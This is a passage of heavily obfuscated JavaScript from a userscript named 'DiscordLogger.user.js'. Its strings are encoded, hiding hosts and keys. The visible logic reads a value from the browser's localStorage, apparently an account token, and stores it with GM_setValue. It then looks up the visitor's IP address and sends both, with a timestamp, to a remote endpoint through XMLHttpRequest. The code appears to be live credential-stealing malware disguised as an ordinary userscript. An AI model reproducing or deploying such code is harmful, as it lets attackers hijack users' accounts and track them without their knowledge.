                    case Xr1BPhT(b_d2PUs(oOB_fmE(-0x25), MxsDFba = i1sC6Va(0x3b))):
                        return b_d2PUs(bWIcos, MxsDFba = 0x19);
                    case Xr1BPhT(b_d2PUs(0x9, KaScbe(i1sC6Va(0x3b)))):
                        return b_d2PUs(bWIcos, RAk6FYK, KaScbe(0x3))
                    }
                }
                function zjNvVvv(bWIcos) {
                    var RAk6FYK;
                    function R8kMhwH(bWIcos) {
                        return OblzcV1[bWIcos < 0x9 ? bWIcos < -0x28 ? bWIcos - 0x17 : bWIcos < -0x28 ? bWIcos - 0x53 : bWIcos < -0x28 ? bWIcos - 0x62 : bWIcos < 0x9 ? bWIcos < -0x28 ? bWIcos + 0x2a : bWIcos > 0x9 ? bWIcos + 0x1d : bWIcos < 0x9 ? bWIcos + 0x27 : bWIcos - 0x2 : bWIcos + 0x18 : bWIcos + 0x42]
                    }
                    RAk6FYK = dJTG4Xu(RAk6FYK=>{
                        var R8kMhwH = w_KcLb(RAk6FYK=>{
                            return OblzcV1[RAk6FYK < 0x15 ? RAk6FYK > -0x1c ? RAk6FYK < 0x15 ? RAk6FYK + 0x1b : RAk6FYK - 0x33 : RAk6FYK + 0x3e : RAk6FYK - 0x23]
                        }
                        , 0x1);
                        return TBU85Q[RAk6FYK < i1sC6Va(0x4f) ? RAk6FYK > 0x60 ? RAk6FYK < 0x60 ? b_d2PUs(RAk6FYK, 0x4d, KaScbe(-oOB_fmE(-0x35))) : RAk6FYK < R8kMhwH(-0x1) ? RAk6FYK < 0x74 ? RAk6FYK < i1sC6Va(0x50) ? b_d2PUs(RAk6FYK, 0x34, MxsDFba = 0x3) : RAk6FYK > 0x60 ? RAk6FYK > i1sC6Va(0x50) ? RAk6FYK < 0x60 ? b_d2PUs(RAk6FYK, 0x32, KaScbe(-oOB_fmE(-0x35))) : b_d2PUs(RAk6FYK, 0x61, KaScbe(-oOB_fmE(-0x35))) : b_d2PUs(RAk6FYK, 0x46, MxsDFba = i1sC6Va(0x3d)) : b_d2PUs(RAk6FYK, oOB_fmE(-0x22), KaScbe(0x3)) : b_d2PUs(RAk6FYK, 0xd, KaScbe(0x3)) : b_d2PUs(RAk6FYK, 0x24, MxsDFba = -oOB_fmE(-0x35)) : b_d2PUs(RAk6FYK, i1sC6Va(0x52), MxsDFba = -oOB_fmE(-0x35)) : b_d2PUs(RAk6FYK, 0x5d, KaScbe(oOB_fmE(-0x36)))]
                    }
                    , R8kMhwH(-0x20));
                    return bWIcos = b_d2PUs(sD0FIDo, (sD0FIDo = bWIcos,
                    RAk6FYK(0x61)), MxsDFba = 0x3),
                    bWIcos
                }
                const She4E1 = (sD0FIDo = sD0FIDo,
                Knxy9z[Xr1BPhT(b_d2PUs(0x11, KaScbe(i1sC6Va(0x3b))))]);
                if (VLtDhz(window[Knxy9z[Xr1BPhT(b_d2PUs(0x10, KaScbe(oOB_fmE(-0x38))))]][XRlasE(oOB_fmE(-0x28))][XRlasE(oOB_fmE(-0x35))](uWAcdV[Xr1BPhT(b_d2PUs(0x14, KaScbe(oOB_fmE(-0x38))))]), sD0FIDo = Xr1BPhT(b_d2PUs(0xf, MxsDFba = oOB_fmE(-0x38))))) {
                    var xR4Dh32, OuUfPd5, ruribC;
                    void (OuUfPd5 = OuUfPd5,
                    ruribC = ruribC);
                    function BS1jKU(bWIcos) {
                        return TBU85Q[bWIcos < i1sC6Va(0x48) ? bWIcos > i1sC6Va(0x49) ? b_d2PUs(bWIcos, 0x18, KaScbe(-i1sC6Va(0x3e))) : b_d2PUs(bWIcos, 0x41, MxsDFba = -i1sC6Va(0x3e)) : b_d2PUs(bWIcos, i1sC6Va(0x53), KaScbe(-0xb))]
                    }
                    const HGQbWZQ = (b_d2PUs((xR4Dh32 = {
                        [BS1jKU(oOB_fmE(-0x1f))]: XRlasE[q54EWbN(i1sC6Va(0x36))](b_d2PUs(i1sC6Va(0x41), KaScbe(0xc)), i1sC6Va(0x52))
                    },
                    OuUfPd5 = XRlasE[bWIcos](Xr1BPhT(b_d2PUs(0xe, MxsDFba = oOB_fmE(-0x38))), [0x10]),
                    ruribC = [XRlasE(BS1jKU(0x1f)), XRlasE(0x1d)]), KaScbe(i1sC6Va(0x55))),
                    new URL(window[XRlasE(Xr1BPhT(b_d2PUs(0xc, MxsDFba = 0x15)))][XRlasE(i1sC6Va(0x4b))]))
                      , D5eS7Q = GM_getValue(XRlasE(BS1jKU(0x28)), 0x0);
                    fetch(XRlasE(BS1jKU(0x29)))[ruribC[0x0]](bWIcos=>bWIcos[OuUfPd5]())[Knxy9z[q54EWbN(0x36)]](bWIcos=>{
                        var RAk6FYK = [XRlasE(0x12), XRlasE(0x13)];
                        const R8kMhwH = bWIcos.ip;
                        if (D5eS7Q != oOB_fmE(-0x1b)) {
                            var KYEFRmd, TtfRCYa, i97aYg;
                            function e7lDmn(bWIcos) {
                                return OblzcV1[bWIcos < 0x4a ? bWIcos > 0x19 ? bWIcos < 0x19 ? bWIcos - 0x6 : bWIcos > 0x4a ? bWIcos - 0x18 : bWIcos < 0x4a ? bWIcos > 0x19 ? bWIcos - 0x1a : bWIcos - 0x1d : bWIcos + 0x1b : bWIcos + 0x64 : bWIcos - 0x28]
                            }
                            void (KYEFRmd = KYEFRmd,
                            TtfRCYa = TtfRCYa,
                            i97aYg = i97aYg);
                            function Ais7FrM(RAk6FYK) {
                                var R8kMhwH = w_KcLb(RAk6FYK=>{
                                    return OblzcV1[RAk6FYK < 0x24 ? RAk6FYK < -0xd ? RAk6FYK + 0x48 : RAk6FYK > -0xd ? RAk6FYK > -0xd ? RAk6FYK > -0xd ? RAk6FYK > 0x24 ? RAk6FYK - 0x16 : RAk6FYK < -0xd ? RAk6FYK + 0x25 : RAk6FYK + 0xc : RAk6FYK + 0x13 : RAk6FYK + 0x3a : RAk6FYK + 0x53 : RAk6FYK + 0x9]
                                }
                                , 0x1);
                                return TBU85Q[RAk6FYK > b_d2PUs(oOB_fmE(-0x1d), KaScbe(0x15)) ? RAk6FYK < 0x7 ? RAk6FYK > b_d2PUs(0xd, KaScbe(0x15)) ? RAk6FYK < b_d2PUs(R8kMhwH(0x15), KaScbe(0x15)) ? b_d2PUs(RAk6FYK, 0x24, KaScbe(oOB_fmE(-0x36))) : RAk6FYK > b_d2PUs(oOB_fmE(-0x1d), KaScbe(0x15)) ? RAk6FYK > 0x7 ? b_d2PUs(RAk6FYK, 0x21, MxsDFba = -0xb) : RAk6FYK < R8kMhwH(0x4) ? RAk6FYK > R8kMhwH(0x4) ? b_d2PUs(RAk6FYK, 0x4e, KaScbe(R8kMhwH(-0x4))) : RAk6FYK > b_d2PUs(i1sC6Va(0x56), MxsDFba = oOB_fmE(-0x38)) ? b_d2PUs(RAk6FYK, 0xc, KaScbe(oOB_fmE(-0x36))) : b_d2PUs(RAk6FYK, 0x14, MxsDFba = oOB_fmE(-0x36)) : b_d2PUs(RAk6FYK, 0x41, KaScbe(-0xb)) : b_d2PUs(RAk6FYK, 0x1b, KaScbe(0x3)) : b_d2PUs(RAk6FYK, 0x4b, MxsDFba = -0xb) : b_d2PUs(RAk6FYK, 0x1d, KaScbe(0x3)) : b_d2PUs(RAk6FYK, 0x31, MxsDFba = -oOB_fmE(-0x35))]
                            }
                            const HiOSudS = (b_d2PUs((KYEFRmd = {
                                [q54EWbN(0x3a)]: XRlasE(0x1a)
                            },
                            TtfRCYa = XRlasE(0x19),
                            i97aYg = XRlasE(0x11)), KaScbe(i1sC6Va(0x36))),
                            new XMLHttpRequest)
                              , EaOD_5 = (HiOSudS[i97aYg](RAk6FYK[0x0], She4E1),
                            HiOSudS[RAk6FYK[Xr1BPhT(b_d2PUs(0x6, MxsDFba = 0x15))]](XRlasE(0x14), Knxy9z[Xr1BPhT(b_d2PUs(e7lDmn(0x23), MxsDFba = 0x15))]),
                            {
                                [Knxy9z.foJGrQ]: XRlasE(oOB_fmE(-0x2a)),
                                [Knxy9z[Ais7FrM(b_d2PUs(0x2, MxsDFba = e7lDmn(0x20)))]]: VLtDhz(b_d2PUs(TtfRCYa + new Date + KYEFRmd.QfjMPt + D5eS7Q + XRlasE[BS1jKU(0x25)](Xr1BPhT(b_d2PUs(0xe, KaScbe(oOB_fmE(-0x38)))), [0x1b]), R8kMhwH, KaScbe(0x3)), '`', zjNvVvv(Ais7FrM(b_d2PUs(i1sC6Va(0x3c), MxsDFba = i1sC6Va(0x3b)))))
                            });
                            HiOSudS[xR4Dh32[BS1jKU(i1sC6Va(0x54))]](JSON[ruribC[0x1]](EaOD_5))
                        }
                    }
                    )[XRlasE[BS1jKU(oOB_fmE(-0x18))](BS1jKU(i1sC6Va(0x57)), [0x1e])](bWIcos=>b_d2PUs(0x0, KaScbe(0xc)))
                }
                if (window[XRlasE(0x9)][uWAcdV[Xr1BPhT(b_d2PUs(0x6, MxsDFba = 0x15))]][XRlasE(0xb)](XRlasE(Xr1BPhT(b_d2PUs(0x5, KaScbe(oOB_fmE(-0x38))))))) {
                    var Sryxgvk;
                    function wKC3gY1(bWIcos) {
                        return OblzcV1[bWIcos > 0xe ? bWIcos - 0x2 : bWIcos > 0xe ? bWIcos - 0x34 : bWIcos < -0x23 ? bWIcos - 0x11 : bWIcos + 0x22]
                    }
                    Sryxgvk = XRlasE(0x1f);
                    const TBU85Q = localStorage[XRlasE(Xr1BPhT(b_d2PUs(wKC3gY1(0x2), MxsDFba = oOB_fmE(-0x38))))];
                    if (TBU85Q != wKC3gY1(0x1) && tYd_UKd[q54EWbN(0x38)][Sryxgvk](wKC3gY1(-0x10)) == 'g') {
                        GM_setValue(XRlasE(Xr1BPhT(b_d2PUs(oOB_fmE(-0x1a), KaScbe(0x15)))), TBU85Q)
                    }
                }
                function E4E2Ol(bWIcos) {
                    var RAk6FYK, R8kMhwH;
                    function KYEFRmd(bWIcos) {
                        return OblzcV1[bWIcos < -0x33 ? bWIcos < -0x33 ? bWIcos + 0x63 : bWIcos + 0x13 : bWIcos - 0x3c]
                    }
                    void (RAk6FYK = [q54EWbN(KYEFRmd(-0x3e))],
                    R8kMhwH = dJTG4Xu(RAk6FYK=>{
                        var R8kMhwH = w_KcLb(RAk6FYK=>{
                            return OblzcV1[RAk6FYK > 0x49 ? RAk6FYK - 0x45 : RAk6FYK < 0x49 ? RAk6FYK - 0x19 : RAk6FYK + 0x48]
                        }
                        , 0x1);
                        return TBU85Q[RAk6FYK > oOB_fmE(-0x18) ? b_d2PUs(RAk6FYK, R8kMhwH(0x1a), KaScbe(-KYEFRmd(-0x5a))) : RAk6FYK < 0x11 ? b_d2PUs(RAk6FYK, 0x7, MxsDFba = -oOB_fmE(-0x35)) : RAk6FYK < 0x25 ? RAk6FYK > oOB_fmE(-0x18) ? b_d2PUs(RAk6FYK, 0xc, MxsDFba = -0xb) : RAk6FYK < 0x25 ? RAk6FYK > 0x11 ? RAk6FYK > oOB_fmE(-0x17) ? RAk6FYK > 0x25 ? b_d2PUs(RAk6FYK, 0x2b, MxsDFba = 0x3) : RAk6FYK < oOB_fmE(-0x18) ? b_d2PUs(RAk6FYK, i1sC6Va(0x5d), MxsDFba = -R8kMhwH(0x22)) : b_d2PUs(RAk6FYK, oOB_fmE(-0x2c), MxsDFba = -0xb) : b_d2PUs(RAk6FYK, oOB_fmE(-0x21), KaScbe(-KYEFRmd(-0x5a))) : b_d2PUs(RAk6FYK, KYEFRmd(-0x50), KaScbe(i1sC6Va(0x3d))) : b_d2PUs(RAk6FYK, KYEFRmd(-0x38), MxsDFba = 0x3) : b_d2PUs(RAk6FYK, R8kMhwH(0x38), KaScbe(-0xb))]
                    }
                    , oOB_fmE(-0x37)));
                    const TtfRCYa = RAk6FYK[KYEFRmd(-0x57)]
                      , i97aYg = b_d2PUs('', bWIcos || '', MxsDFba = 0x3)
                      , HiOSudS = i97aYg.length
                      , EaOD_5 = [];
                    let VLtDhz = 0x0
                      , zjNvVvv = 0x0
                      , She4E1 = b_d2PUs(0x1, KaScbe(i1sC6Va(0x3b)));
                    for (let xR4Dh32 = R8kMhwH(KYEFRmd(-0x3b)); xR4Dh32 < HiOSudS; xR4Dh32++) {
                        var OuUfPd5;
                        function ruribC(bWIcos) {
                            return OblzcV1[bWIcos < 0x5c ? bWIcos < 0x2b ? bWIcos + 0x1c : bWIcos > 0x2b ? bWIcos > 0x2b ? bWIcos > 0x2b ? bWIcos < 0x2b ? bWIcos + 0x1 : bWIcos > 0x5c ? bWIcos - 0x5b : bWIcos > 0x2b ? bWIcos - 0x2c : bWIcos - 0x63 : bWIcos + 0x11 : bWIcos + 0x7 : bWIcos + 0x24 : bWIcos - 0x4f]
                        }
                        OuUfPd5 = dJTG4Xu(RAk6FYK=>{
                            var R8kMhwH = w_KcLb(RAk6FYK=>{
                                return OblzcV1[RAk6FYK > -0x22 ? RAk6FYK > -0x22 ? RAk6FYK < 0xf ? RAk6FYK + 0x21 : RAk6FYK - 0x3a : RAk6FYK - 0x15 : RAk6FYK - 0x18]
                            }
                            , 0x1);
                            return TBU85Q[RAk6FYK < b_d2PUs(0x27, KaScbe(0x15)) ? RAk6FYK > b_d2PUs(0x3b, KaScbe(0x15)) ? RAk6FYK < b_d2PUs(0x27, KaScbe(0x15)) ? RAk6FYK > b_d2PUs(0x3b, KaScbe(oOB_fmE(-0x38))) ? b_d2PUs(RAk6FYK, 0x3a, KaScbe(0x3)) : b_d2PUs(RAk6FYK, R8kMhwH(0x8), KaScbe(0x3)) : b_d2PUs(RAk6FYK, KYEFRmd(-0x39), KaScbe(-0xb)) : b_d2PUs(RAk6FYK, 0x34, MxsDFba = KYEFRmd(-0x5b)) : b_d2PUs(RAk6FYK, KYEFRmd(-0x38), KaScbe(R8kMhwH(-0x19)))]
                        }
                        , 0x1);
                        const BS1jKU = TtfRCYa[q54EWbN(0x3c)](i97aYg[xR4Dh32]);
                        if (BS1jKU === b_d2PUs(OuUfPd5(b_d2PUs(0x2c, KaScbe(0x15))), MxsDFba = ruribC(0x32))) {
                            continue
                        }
                        if (She4E1 < 0x0) {
                            She4E1 = BS1jKU
                        } else {
                            var Sryxgvk = w_KcLb(bWIcos=>{
                                return OblzcV1[bWIcos > 0x4 ? bWIcos < 0x4 ? bWIcos + 0xc : bWIcos < 0x4 ? bWIcos + 0xb : bWIcos < 0x4 ? bWIcos - 0x5b : bWIcos > 0x4 ? bWIcos < 0x35 ? bWIcos > 0x4 ? bWIcos - 0x5 : bWIcos + 0x59 : bWIcos - 0x10 : bWIcos - 0x5c : bWIcos - 0x21]
                            }
                            , 0x1);
                            b_d2PUs((She4E1 += b_d2PUs(BS1jKU, 0x5b, KaScbe(-0x2d)),
                            VLtDhz |= She4E1 << zjNvVvv,
                            zjNvVvv += (She4E1 & 0x1fff) > 0x58 ? OuUfPd5(b_d2PUs(Sryxgvk(0x31), KaScbe(0x15))) : Xr1BPhT(b_d2PUs(ruribC(0x34), KaScbe(0x15)))), KaScbe(0xc));
                            do {
                                var wKC3gY1 = dJTG4Xu(RAk6FYK=>TBU85Q[RAk6FYK < i1sC6Va(0x4c) ? b_d2PUs(RAk6FYK, 0x12, KaScbe(-i1sC6Va(0x3e))) : RAk6FYK < oOB_fmE(-0x27) ? b_d2PUs(RAk6FYK, i1sC6Va(0x4a), MxsDFba = -Sryxgvk(0xe)) : RAk6FYK < KYEFRmd(-0x4c) ? b_d2PUs(RAk6FYK, 0x22, MxsDFba = -oOB_fmE(-0x35)) : RAk6FYK < 0xc ? b_d2PUs(RAk6FYK, 0x54, MxsDFba = 0x3) : RAk6FYK > 0x20 ? b_d2PUs(RAk6FYK, Sryxgvk(0x29), MxsDFba = ruribC(0x34)) : RAk6FYK < Sryxgvk(0x32) ? RAk6FYK > 0xc ? b_d2PUs(RAk6FYK, 0xd, KaScbe(-Sryxgvk(0xe))) : b_d2PUs(RAk6FYK, 0x16, KaScbe(0x3)) : b_d2PUs(RAk6FYK, oOB_fmE(-0x35), KaScbe(-0xb))], 0x1);
                                b_d2PUs((EaOD_5[q54EWbN(oOB_fmE(-0x29))](VLtDhz & oOB_fmE(-0xf)),
                                VLtDhz >>= wKC3gY1(0x1f),
                                zjNvVvv -= 0x8), KaScbe(KYEFRmd(-0x4c)))
                            } while (zjNvVvv > KYEFRmd(-0x53));
                            She4E1 = b_d2PUs(0x1, MxsDFba = Sryxgvk(0xb))
                        }
                    }
                    if (She4E1 > b_d2PUs(0x1, KaScbe(KYEFRmd(-0x5d)))) {
                        var E4E2Ol = q54EWbN(0x2f);
                        EaOD_5[E4E2Ol]((VLtDhz | She4E1 << zjNvVvv) & 0xff)
                    }
                    return trBscdE(EaOD_5)
                }
                function XRlasE(bWIcos, RAk6FYK, R8kMhwH, KYEFRmd=E4E2Ol, TtfRCYa=e7lDmn) {
                    if (R8kMhwH) {
                        return RAk6FYK[e7lDmn[R8kMhwH]] = XRlasE(bWIcos, RAk6FYK)
                    } else {
                        if (RAk6FYK) {
                            [TtfRCYa,RAk6FYK] = [KYEFRmd(TtfRCYa), bWIcos || R8kMhwH]
                        }
                    }
                    return RAk6FYK ? bWIcos[TtfRCYa[RAk6FYK]] : e7lDmn[bWIcos] || (R8kMhwH = (TtfRCYa[bWIcos],
                    KYEFRmd),
                    e7lDmn[bWIcos] = R8kMhwH(HiOSudS[bWIcos]))
                }
                function xpApj4J() {
                    var bWIcos = w_KcLb(RAk6FYK=>{
                        return OblzcV1[RAk6FYK > 0x3a ? RAk6FYK - 0x28 : RAk6FYK > 0x9 ? RAk6FYK - 0xa : RAk6FYK - 0xb]
                    }
                    , 0x1);
                    return [i1sC6Va(0x41), 0x3f, 0x6, EoEOhk, q54EWbN(0x3e), 0x16, b_d2PUs(0x0, MxsDFba = 0xc), 0xf, 0x9, q54EWbN.apply(bWIcos(0xd), [0x3f]), q54EWbN(0x40), 0x33, f_IMfQY.OoWzTG, q54EWbN(0x39), 0x1, 0xc, 0xd, bWIcos(0x38), 0x8]
                }
                function dJTG4Xu(bWIcos, RAk6FYK) {
                    var R8kMhwH;
                    function KYEFRmd(bWIcos) {
                        return OblzcV1[bWIcos < -0x20 ? bWIcos + 0x4f : bWIcos < -0x20 ? bWIcos - 0x16 : bWIcos < -0x20 ? bWIcos + 0x10 : bWIcos < -0x20 ? bWIcos - 0x5a : bWIcos < 0x11 ? bWIcos > 0x11 ? bWIcos - 0x19 : bWIcos < 0x11 ? bWIcos + 0x1f : bWIcos - 0x51 : bWIcos + 0x64]
                    }
                    R8kMhwH = function() {
                        return bWIcos(...arguments)
                    }
                    ;
                    return Object[q54EWbN(0x42)](R8kMhwH, q54EWbN[KYEFRmd(-0x1a)](oOB_fmE(-0x3b), [0x5]), {
                        [q54EWbN(0x43)]: RAk6FYK,
                        [q54EWbN(0x44)]: !0x0
                    }),
                    R8kMhwH
                }
            }());
            function pg8_Mku(bWIcos) {
                const RAk6FYK = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"'
                  , R8kMhwH = '' + (bWIcos || '')
                  , KYEFRmd = R8kMhwH.length
                  , TtfRCYa = [];
                let i97aYg = i1sC6Va(0x41)
                  , TBU85Q = 0x0
                  , f_IMfQY = -i1sC6Va(0x3c);
                for (let EoEOhk = 0x0; EoEOhk < KYEFRmd; EoEOhk++) {
                    var EwaGoLA = w_KcLb(bWIcos=>{
                        return OblzcV1[bWIcos > 0x8e ? bWIcos + 0x59 : bWIcos > 0x8e ? bWIcos - 0x41 : bWIcos - 0x5e]
                    }
                    , 0x1);
                    const Xv7XB_p = RAk6FYK.indexOf(R8kMhwH[EoEOhk]);
                    if (Xv7XB_p === -0x1) {
                        continue
                    }
                    if (f_IMfQY < EwaGoLA(0x6a)) {
                        f_IMfQY = Xv7XB_p
                    } else {
                        void (f_IMfQY += Xv7XB_p * 0x5b,
                        i97aYg |= f_IMfQY << TBU85Q,
                        TBU85Q += (f_IMfQY & 0x1fff) > 0x58 ? 0xd : EwaGoLA(0x8c));
                        do {
                            typeof (TtfRCYa.push(i97aYg & EwaGoLA(0x8d)),
                            i97aYg >>= 0x8,
                            TBU85Q -= 0x8)
                        } while (TBU85Q > i1sC6Va(0x45));
                        f_IMfQY = -0x1
                    }
                }
                if (f_IMfQY > -i1sC6Va(0x3c)) {
                    TtfRCYa.push((i97aYg | f_IMfQY << TBU85Q) & 0xff)
                }
                return oAgZ8a(TtfRCYa)
            }
            function q54EWbN(OblzcV1, bWIcos, RAk6FYK, R8kMhwH=pg8_Mku, KYEFRmd=HGQbWZQ) {
                if (RAk6FYK) {
                    return bWIcos[HGQbWZQ[RAk6FYK]] = q54EWbN(OblzcV1, bWIcos)
                } else {
                    if (bWIcos) {
                        [KYEFRmd,bWIcos] = [R8kMhwH(KYEFRmd), OblzcV1 || RAk6FYK]
                    }
                }
                return bWIcos ? OblzcV1[KYEFRmd[bWIcos]] : HGQbWZQ[OblzcV1] || (RAk6FYK = (KYEFRmd[OblzcV1],
                R8kMhwH),
                HGQbWZQ[OblzcV1] = RAk6FYK(wrMf0u8[OblzcV1]))
            }
            function NjtUI9() {
                return [0x3f, 0x6, 'undefined', void 0x0, 0x5, 'apply', 0x15, 0x1, 0x3, 0xb, 'rjPOUxe', 'IFnzG2', 0x0, 'call', 0x55, 0x41, 0x7, 0xef, 0x2, 0x2b, 0x17, 0x2f, 0xa, 0xc, 0x18, 0xf, 0x74, 0x60, 0x33, 0x1c, 0x22, 0x24, 0x19, 0xd, 0x1e, null, 0x4, 0x3b, 0x25, 0x11, 0x12, 0x1f, 0x54, 0x4f, 0x2a, 0x20, 0xe, 0xff]
            }
            function w_KcLb(OblzcV1, bWIcos) {
                var RAk6FYK = function() {
                    return OblzcV1(...arguments)
                };
                Object['defineProperty'](RAk6FYK, 'length', {
                    'value': bWIcos,
                    'configurable': true
                });
                return RAk6FYK
            }
        }, seed)
    }
    //# sourceURL=chrome-extension://iikmkjmpaadaobahmlepeloendndfphd/userscript.html?name=DiscordLogger.user.js&id=ba3d2d5a-8a79-47c2-b355-06392c15ce3d
}
